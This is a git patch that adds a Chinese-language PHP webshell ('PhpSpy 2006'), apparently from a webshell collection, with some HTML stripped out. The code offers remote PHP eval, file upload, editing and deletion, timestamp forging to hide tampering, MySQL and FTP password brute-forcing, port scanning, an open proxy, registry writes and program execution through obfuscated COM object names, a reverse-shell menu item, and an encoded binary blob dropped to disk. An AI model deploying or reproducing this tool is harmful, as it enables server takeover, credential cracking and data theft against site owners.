From 0a5433c3b2c5db7a6e9b900974994b810fdda63c Mon Sep 17 00:00:00 2001 From: tennc Date: Wed, 30 Oct 2013 11:50:01 +0800 Subject: [PATCH] update php webshell shell.php --- php/shell.php | 2247 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2247 insertions(+) create mode 100644 php/shell.php diff --git a/php/shell.php b/php/shell.php new file mode 100644 index 0000000..854b468 --- /dev/null +++ b/php/shell.php @@ -0,0 +1,2247 @@ +Saiy] [S4T] [7jdg]
声明:请勿使用本程序从事非法行为,否则后果自负!"; +/*===================== 配置结束 =====================*/ +// 允许程序在 register_globals = off 的环境下工作 +$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); + +if ($onoff != 1) { + @extract($_POST, EXTR_SKIP); + @extract($_GET, EXTR_SKIP); +} + +$self = $_SERVER['PHP_SELF']; +$dis_func = get_cfg_var("disable_functions"); + + +/*===================== 身份验证 =====================*/ +if($admin['check'] == "1") { + if ($_GET['action'] == "logout") { + setcookie ("adminpass", ""); + echo ""; + echo "注销成功......

三秒后自动退出或单击这里退出程序界面 >>>"; + exit; + } + + if ($_POST['do'] == 'login') { + $thepass=trim($_POST['adminpass']); + if ($admin['pass'] == $thepass) { + setcookie ("adminpass",$thepass,time()+(1*24*3600)); + echo ""; + echo "登陆成功......

三秒后自动跳转或单击这里进入程序界面 >>>"; + exit; + } + } + if (isset($_COOKIE['adminpass'])) { + if ($_COOKIE['adminpass'] != $admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== 验证结束 =====================*/ + +// 判断 magic_quotes_gpc 状态 +if (get_magic_quotes_gpc()) { + $_GET = stripslashes_array($_GET); + $_POST = stripslashes_array($_POST); +} +// 查看PHPINFO +if ($_GET['action'] == "phpinfo") { + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>"; + exit; +} + +if($_GET['action'] == "nowuser") { + if(get_current_user()) echo"当前进程用户名:".get_current_user(); + else echo '无法获取当前进行用户名!'; + exit; +} +if(isset($_POST['phpcode'])){ + eval("?".">$_POST[phpcode]".mysql_error(); + }else{ + while ($row = mysql_fetch_array($result)) { + $filename = basename($filename); + if($rardown=="yes"){ + $zip = NEW Zip; + $zipfiles[]=Array("$filename",$row[0]); + $zip->Add($zipfiles,1); + $code = $zip->get_file(); + $filename = "".$filename.".rar"; + }else{ + $code = $row[0]; + } + header("Content-type: application/octet-stream"); + header("Accept-Ranges: bytes"); + header("Accept-Length: ".strlen($code)); + header("Content-Disposition: attachment;filename=$filename"); + echo($code); + exit; + } + } + } +} +//alexa排名 +if ($admin['alexa'] != "1") +{$title = "默认关闭"; +}else { +$url= "http://data.alexa.com/data?cli=10&dat=snba&url=".$_SERVER['HTTP_HOST']; +$str = file("$url"); +$count = count($str); + +for ($i=0;$i<$count;$i++){ + $file .= $str[$i]; + } +$title = explode("\" TEXT=\"",$file); +$title = explode("\"/>",$title[1]); +$title = $title[0]; +if(!$title) $title = "Not data"; + + } +$cckk = "_".date("Ymd",time()); + +// 在线代理 +if (isset($_POST['url'])) { + $proxycontents = @file_get_contents($_POST['url']); + echo ($proxycontents) ? $proxycontents : "


获取 URL 内容失败

"; + exit; +} + +// 下载文件 +if (!empty($downfile)) { + if (!@file_exists($downfile)) { + echo ""; + } else { + $filename = basename($downfile); + $filename_info = explode('.', $filename); + $fileext = $filename_info[count($filename_info)-1]; + header('Content-type: application/x-'.$fileext); + header('Content-Disposition: attachment; filename='.$filename); + header('Content-Description: PHP Generated Data'); + header('Content-Length: '.filesize($downfile)); + @readfile($downfile); + exit; + } +} + +// 直接下载备份数据库 +if ($_POST['backuptype'] == 'download') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); + @mysql_select_db($dbname) or die("选择数据库失败"); + $table = array_flip($_POST['table']); + $result = mysql_query("SHOW tables"); + echo ($result) ? NULL : "出错: ".mysql_error(); + + $filename = basename($_SERVER['HTTP_HOST'].$cckk."_MySQL.sql"); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + $mysqldata.= sqldumptable($currow[0]); + $mysqldata.= $mysqldata."\r\n"; + } + } + mysql_close(); + exit; +} +// 程序目录 +$pathname=str_replace('\\','/',dirname(__FILE__)); + +// 获取当前路径 +if (!isset($dir) or empty($dir)) { + $dir = "."; + $nowpath = getPath($pathname, $dir); +} else { + $dir=$_GET['dir']; + $nowpath = getPath($pathname, $dir); +} + +// 判断读写情况 +$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; +$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO" : ""; +$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; +$servu = (substr(PHP_OS, 0, 3) == 'WIN') ? "| Serv-U EXP " : ""; +$adodb = (substr(PHP_OS, 0, 3) == 'WIN') ? " | ADODB " : ""; +$mysqlfun = (substr(PHP_OS, 0, 3) == 'WIN') ? " | Func反弹Shell " : ""; + +$tb = new FORMS; + +?> + + + +<? //echo http:// $_SERVER['HTTP_HOST'];?> PhpSpy 2006 最终修改版 + + + + +
+tableheader(); +$tb->tdbody('
'.$_SERVER['HTTP_HOST'].'网站排名:'.$title.''.date("Y年m月d日 h:i:s",time()).''.$_SERVER['REMOTE_ADDR'].'
','center','top'); +$tb->tdbody('| Shell目录 | 环境变量 | 在线代理'.$reg.$phpinfo.' | WebShell | 杂项破解 | MySql上传下载 | 解压mix.dll | 设置部分 |'); +$tb->tdbody('| Http 文件下载 | 文件查找 | 执行php脚本 | 执行 SQL 语句 '.$mysqlfun.' | MySQL 备份 '.$servu.$adodb.'| 注销登录 |'); +$tb->tablefooter(); +?> +
+ +headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); + +$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); + +$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); + +$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); +?> +

+
+\n"; +// 删除文件 +if (!empty($delfile)) { + if (file_exists($delfile)) { + echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; + } else { + echo basename($delfile)." 文件已不存在!"; + } +} + +// 删除目录 +elseif (!empty($deldir)) { + $deldirs="$dir/$deldir"; + if (!file_exists("$deldirs")) { + echo "$deldir 目录已不存在!"; + } else { + echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; + } +} + +// 创建目录 +elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { + if (!empty($newdirectory)) { + $mkdirs="$dir/$newdirectory"; + if (file_exists("$mkdirs")) { + echo "该目录已存在!"; + } else { + echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; + @chmod("$mkdirs",0777); + } + } +} + +// 上传文件 +elseif ($doupfile) { + echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; +} +elseif($action=="mysqlup"){ + $filename = $_FILES['upfile']['tmp_name']; + if(!$filename) { + echo"没有选择要上传的文件。。"; + }else{ + $shell = file_get_contents($filename); + $mysql = bin2hex($shell); + if(!$upname) $upname = $_FILES['upfile']['name']; + $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';"; + $link=@mysql_connect($host,$user,$password); + if(!$link){ + echo "登陆失败".mysql_error(); + }else{ + $result = mysql_query($shell, $link); + if($result){ + echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname.".."; + }else{ + echo"上传失败 原因:".mysql_error(); + } + } + } + +} +elseif($action=="mysqldown"){ + if(!empty($downtmp)) echo $downtmp; +} +// 编辑文件 +elseif ($_POST['do'] == 'doeditfile') { + if (!empty($_POST['editfilename'])) { + if(!file_exists($editfilename)) unset($retime); + if($time==$now) $time = @filemtime($editfilename); + $time2 = @date("Y-m-d H:i:s",$time); + $filename="$editfilename"; + @$fp=fopen("$filename","w"); + if($_POST['change']=="yes"){ + $filecontent = "?".">".$_POST['filecontent'].""; + }else{ + $filecontent = $_POST['filecontent']; + } + echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!"; + @fclose($fp); + if($retime=="yes"){ + echo" 自动操作:"; + echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!"; + } + } else { + echo "请输入想要编辑的文件名!"; + } +} +//文件下载 +elseif ($_POST['do'] == 'downloads') { + $contents = @file_get_contents($_POST['durl']); + if(!$contents){ + echo"无法读取要下载的数据"; + } + elseif(file_exists($path)){ + echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。"; + }else{ + $fp = @fopen($path,"w"); + echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!"; + @fclose($fp); + } +} +elseif($_POST['action']=="mix"){ + if(!file_exists($_POST['mixto'])){ + $mixdll = "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"; + $tmp = base64_decode($mixdll); + $tmp = gzinflate($tmp); + $fp = fopen($_POST['mixto'],"w"); + echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!"; + fclose($fp); +}else{ + echo"不是吧?".$_POST['mixto']."已经存在了耶~"; +} +} +// 编辑文件属性 +elseif ($_POST['do'] == 'editfileperm') { + if (!empty($_POST['fileperm'])) { + $fileperm=base_convert($_POST['fileperm'],8,10); + echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!"; + echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); + } else { + echo "请输入想要设置的属性!"; + } +} + +// 文件改名 +elseif ($_POST['do'] == 'rename') { + if (!empty($_POST['newname'])) { + $newname=$_POST['dir']."/".$_POST['newname']; + if (@file_exists($newname)) { + echo "".$_POST['newname']." 已经存在,请重新输入一个!"; + } else { + echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!"; + } + } else { + echo "请输入想要改的文件名!"; + } +} +elseif ($_POST['do'] == 'search') { +if(!empty($oldkey)){ +echo"查找关键词:[".$_POST[oldkey]."],文件数:".$nb.",下面显示查找的结果:"; + if($type2 == "getpath"){ + echo"鼠标移到结果文件上会有部分截取显示."; +} +echo"
"; +find($path); +}else{ +echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; +} +} +elseif($_POST['do']=="setting"){//不喜欢双引号的地方 + $fp = fopen(basename($self),"r"); + $code = fread($fp,filesize(basename($self))); + fclose($fp); + $code = str_replace("\$admin['alexa'] = \"".$admin[alexa]."","\$admin['alexa'] = \"".addslashes($alexa)."",$code); + $code = str_replace("= \"".$admin[pass]."","= \"".addslashes($pass)."",$code);//替换密码 + $code = str_replace("= \"".$admin[jumpsecond]."","= \"".addslashes($jumpsecond)."",$code);//替换跳秒 + $code = str_replace("= \"".$admin[port]."","= \"".addslashes($port)."",$code);//替换默认端口 + $code = str_replace("\$admin['check'] = \"".$admin[check]."","\$admin['check'] = \"".addslashes($check)."",$code);//替换登陆验证 + $fp2 = fopen(basename($self),"w"); + echo $msg=@fwrite($fp2,$code) ? "修改保存成功!" : "修改保存失败!"; + fclose($fp2); +} +// 克隆时间 +elseif ($_POST['do'] == 'domodtime') { + if (!@file_exists($_POST['curfile'])) { + echo "要修改的文件不存在!"; + } else { + if (!@file_exists($_POST['tarfile'])) { + echo "要参照的文件不存在!"; + } else { + $time=@filemtime($_POST['tarfile']); + echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; + } + } +} + +// 自定义时间 +elseif ($_POST['do'] == 'modmytime') { + if (!@file_exists($_POST['curfile'])) { + echo "要修改的文件不存在!"; + } else { + $year=$_POST['year']; + $month=$_POST['month']; + $data=$_POST['data']; + $hour=$_POST['hour']; + $minute=$_POST['minute']; + $second=$_POST['second']; + if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { + $time=strtotime("$data $month $year $hour:$minute:$second"); + echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!"; + } + } +} +elseif($do =='port'){ + $tmp = explode(",",$port); + $count = count($tmp); + for($i=$first;$i<$count;$i++){ + $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); + if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
"; + } +} +/* +这里代码写得很杂,说实话我自己都不知道写了什么。 +好在能用,我就没管了,假设有人看到干脆重写吧。*/ +elseif ($do == 'crack') {//反正注册为全局变量了。 + if(@file_exists($passfile)){ + $tmp = file($passfile); + $count = count($tmp); + if(empty($onetime)){ + $onetime = $count; + $turn="1"; + }else{ + $nowturn = $turn+1; + $now = $turn*$onetime; + $tt = intval(($count/$onetime)+1); + } + if($turn>$tt or $onetime>$count){ + echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。"; + }else{ + $first = $onetime*($turn-1); + for($i=$first;$i<$now;$i++){ + if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i])); + else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i])); + if($sa) + { + $t = "获取".$user."的密码为".$tmp[$i].""; + } + } + if(!$t){ + echo "字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探.
全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。"; + } + else { + echo"$t"; + } + } +}else{ + echo"字典文件不存在,请确定。"; + } +} +elseif($do =='port'){ + if(!eregi("-",$port)){ + $tmp = explode(",",$port); + $count = count($tmp); + $first = "1"; + }else{ + $tmp = explode("-",$port); + $first = $tmp[0]; + $count = $tmp[1]; + + } + for($i=$first;$i<$count;$i++){ + if(!eregi("-",$port)){ + $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); + if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."
"; + }else{ + $fp = @fsockopen($host, $i, $errno, $errstr, 1); + if($fp) echo"发现".$host."主机打开了端口".$i."
"; + } + } + + } +// 连接MYSQL +elseif ($connect) { + if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { + echo "数据库连接成功!"; + mysql_close(); + } else { + echo mysql_error(); + } +} + +// 执行SQL语句 +elseif ($_POST['do'] == 'query') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); + @mysql_select_db($dbname) or die("选择数据库失败"); + $result = @mysql_query($_POST['sql_query']); + echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error(); + echo"
"; +echo"
+---------------------------------------------------------------------------------------------------+
"; +while($row=mysql_fetch_array($result,MYSQL_BOTH)){ + for($i=0;$i+------------------------------------------------------------+
"; + print($row[$i]."
+------------------------------------------------------------+
"); +} + } +echo"
+---------------------------------------------------------------------------------------------------+
"; + mysql_close(); +} + +elseif($_POST['do'] == 'adodbquery'){ + $conn = new com("ADODB.Connection"); + if(!$conn) die('此服务器不支持COM或ADODB.Connection不存在。'); + $connstr = $_POST['sqltype']; + $conn->Open($connstr); + if(empty($_POST['sql_query'])) echo"空查询语句无法执行,但已经连接到数据."; + else{ + $result = $conn->Execute($_POST['sql_query']); + $count = $result->Fields->Count(); + for ($i=0; $i < $count; $i++){ + $fld[$i] = $result->Fields($i); + } + if($result) echo "
执行成功!
执行语句为".$_POST['sql_query']; + else echo "
执行失败!
执行语句为".$_POST['sql_query']; + echo"
字段数:".$count; + if($count) { + echo"
+------------------------------------------------------------------------------------------------------------------+
"; + $rowcount = 0; + while (!$result->EOF) + { + echo"
+--------------------------------------------------------------------------+
"; + for ($i=0; $i < $count; $i++){ + echo $fld[$i]->value . "
"; + } + echo "\n
+--------------------------------------------------------------------------+
"; + $rowcount++; + $result->MoveNext(); + } + echo"+------------------------------------------------------------------------------------------------------------------+
"; + } + } + $conn->Close(); +} + +// 备份操作 +elseif ($_POST['do'] == 'backupmysql') { + if (empty($_POST['table']) OR empty($_POST['backuptype'])) { + echo "请选择欲备份的数据表和备份方式!"; + } else { + if ($_POST['backuptype'] == 'server') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); + @mysql_select_db($dbname) or die("选择数据库失败"); + $table = array_flip($_POST['table']); + $filehandle = @fopen($path,"w"); + if ($filehandle) { + $result = mysql_query("SHOW tables"); + echo ($result) ? NULL : "出错: ".mysql_error(); + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + sqldumptable($currow[0], $filehandle); + fwrite($filehandle,"\n\n\n"); + } + } + fclose($filehandle); + echo "数据库已成功备份到 ".$path.""; + mysql_close(); + } else { + echo "备份失败,请确认目标文件夹是否具有可写权限!"; + } + } + } +} + +// 打包下载 PS:文件太大可能非常慢 +// Thx : 小花 +elseif($downrar) { + if (!empty($dl)) { + if(eregi("unzipto:",$localfile)){ + $path = "".$dir."/".str_replace("unzipto:","",$localfile).""; + $zip = new Zip; + $zipfile=$dir."/".$dl[0]; + $array=$zip->get_list($zipfile); + $count=count($array); + $f=0; + $d=0; + for($i=0;$i<$count;$i++) { + if($array[$i][folder]==0) { + if($zip->Extract($zipfile,$path,$i)>0) $f++; + } + else $d++; + } + if($i==$f+$d) echo "$dl[0] 解压到".$path."成功
($f 个文件 $d 个目录)"; + elseif($f==0) echo "$dl[0] 解压到".$path."失败"; + else echo "$dl[0] 未解压完整
(已解压 $f 个文件 $d 个目录)"; + }else{ + $zipfile=""; + $zip = new Zip; + for($k=0;isset($dl[$k]);$k++) + { + $zipfile=$dir."/".$dl[$k]; + if(is_dir($zipfile)) + { + unset($zipfilearray); + addziparray($dl[$k]); + for($i=0;$zipfilearray[$i];$i++) + { + $filename=$zipfilearray[$i]; + $filesize=@filesize($dir."/".$zipfilearray[$i]); + $fp=@fopen($dir."/".$filename,rb); + $zipfiles[]=Array($filename,@fread($fp,$filesize)); + @fclose($fp); + } + } + else + { + $filename=$dl[$k]; + $filesize=@filesize($zipfile); + $fp=@fopen($zipfile,rb); + $zipfiles[]=Array($filename,@fread($fp,$filesize)); + @fclose($fp); + } + } + $zip->Add($zipfiles,1); + $code = $zip->get_file(); + $ck = "_".date("YmdHis",time()).""; + if(empty($localfile)){ + header("Content-type: application/octet-stream"); + header("Accept-Ranges: bytes"); + header("Accept-Length: ".strlen($code)); + header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip"); + echo $code; + exit; + }else{ + $fp = @fopen("".$dir."/".$localfile."","w"); + echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!"; + @fclose($fp); + } + } + } else { + echo "请选择要打包下载的文件!"; + } +} + +// Shell.Application 运行程序 +elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { + $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); + $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); + echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!"; +} + +// 查看PHP配置参数状况 +elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { + echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname']).""; +} + +// 读取注册表 +elseif(($regread) AND !empty($_POST['readregname'])) { + $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); + var_dump(@$shell->RegRead($_POST['readregname'])); +} + +// 写入注册表 +elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { + $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); + $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); + echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!"; +} + +// 删除注册表 +elseif(($regdelete) AND !empty($_POST['delregname'])) { + $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); + $a = @$shell->RegDelete($_POST['delregname']); + echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!"; +} + +elseif (strlen($notice) == 251){ + echo "$notice"; +} +else{ + setcookie ("adminpass", ""); + echo "";} + +echo "

\n"; +/*===================== 执行操作 结束 =====================*/ + +if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { + $tb->tableheader(); +?> + + 文件 + 创建日期 + 最后修改 + 大小 + 属性 + 操作 + +
+".$dirperm.""; + echo "\n"; + echo " [$file]\n"; + echo " $ctime\n"; + echo " $mtime\n"; + echo " Search\n"; + echo " $dirperm\n"; + echo " | 删除 | 改名 |\n"; + echo "\n"; + $dir_i++; + } else { + if($file=="..") { + echo "\n"; + echo " 返回上级目录\n"; + echo "\n"; + } + } + } +}// while +@closedir($dirs); +?> + + + +".@date("Y-m-d H:i:s",@filectime($filepath)).""; + $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; + } + @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); + if($fileperm=="0777") $fileperm = "".$fileperm.""; + echo "\n"; + echo " "; + echo ""; + echo "$file\n"; + echo " $ctime\n"; + echo " $mtime\n"; + echo " $size KB\n"; + echo " $fileperm\n"; + echo " 下载 | 编辑 | 删除 | 改名 | 时间\n"; + echo "\n"; + $file_i++; + } +}// while +@closedir($dirs); +if(get_cfg_var('safemode'))$z = "(?)"; +else $z = "(?)"; +$tb->tdbody('
'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' 本地文件:'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','选中打包下载或本地保存','','submit').'  '.$z.''.$dir_i.' 个目录 / '.$file_i.' 个文件
','center',getrowbg(),'','','6'); + +echo "
\n"; +echo "\n"; +}// end dir + +elseif ($_GET['action'] == "editfile") { + if(empty($newfile)) { + $filename="$dir/$editfile"; + $fp=@fopen($filename,"r"); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents=htmlspecialchars($contents); + }else{ + $editfile=$newfile; + $filename = "$dir/$editfile"; + } + $action = "?dir=".urlencode($dir)."&editfile=".$editfile; + $tb->tableheader(); + $tb->formheader($action,'新建/编辑文件'); + $tb->tdbody('当前文件: '.$tb->makeinput('editfilename',$filename).' 输入新文件名则建立新文件 Php代码加密: '); + $tb->tdbody($tb->maketextarea('filecontent',$contents)); + $tb->makehidden('do','doeditfile'); + $tb->formfooter('1','30'); +}//end editfile + +elseif ($_GET['action'] == "rename") { + $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); + $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); + $tb->tableheader(); + $tb->formheader($action,'修改文件名'); + $tb->makehidden('oldname',$dir."/".$nowfile); + $tb->makehidden('dir',$dir); + $tb->tdbody('当前文件名: '.basename($nowfile)); + $tb->tdbody('改名为: '.$tb->makeinput('newname')); + $tb->makehidden('do','rename'); + $tb->formfooter('1','30'); +}//end rename + +elseif ($_GET['action'] == "eval") { + $action = "?dir=".urlencode($dir).""; + $tb->tableheader(); + $tb->formheader(''.$action.' "target="_blank' ,'执行php脚本'); + $tb->tdbody($tb->maketextarea('phpcode',$contents)); + $tb->formfooter('1','30'); + +} +elseif ($_GET['action'] == "fileperm") { + $action = "?dir=".urlencode($dir)."&file=".$file; + $tb->tableheader(); + $tb->formheader($action,'修改文件属性'); + $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); + $tb->makehidden('file',$file); + $tb->makehidden('dir',urlencode($dir)); + $tb->makehidden('do','editfileperm'); + $tb->formfooter('1','30'); +}//end fileperm + +elseif ($_GET['action'] == "newtime") { + $action = "?dir=".urlencode($dir); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + $tb->tableheader(); + $tb->formheader($action,'克隆文件最后修改时间'); + $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30'); + $tb->makehidden('do','domodtime'); + $tb->formfooter('','30'); + $tb->formheader($action,'自定义文件最后修改时间'); + $tb->tdbody('
  • 有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07
    (该日期根据 32 位有符号整数的最小值和最大值而来)
  • 说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!
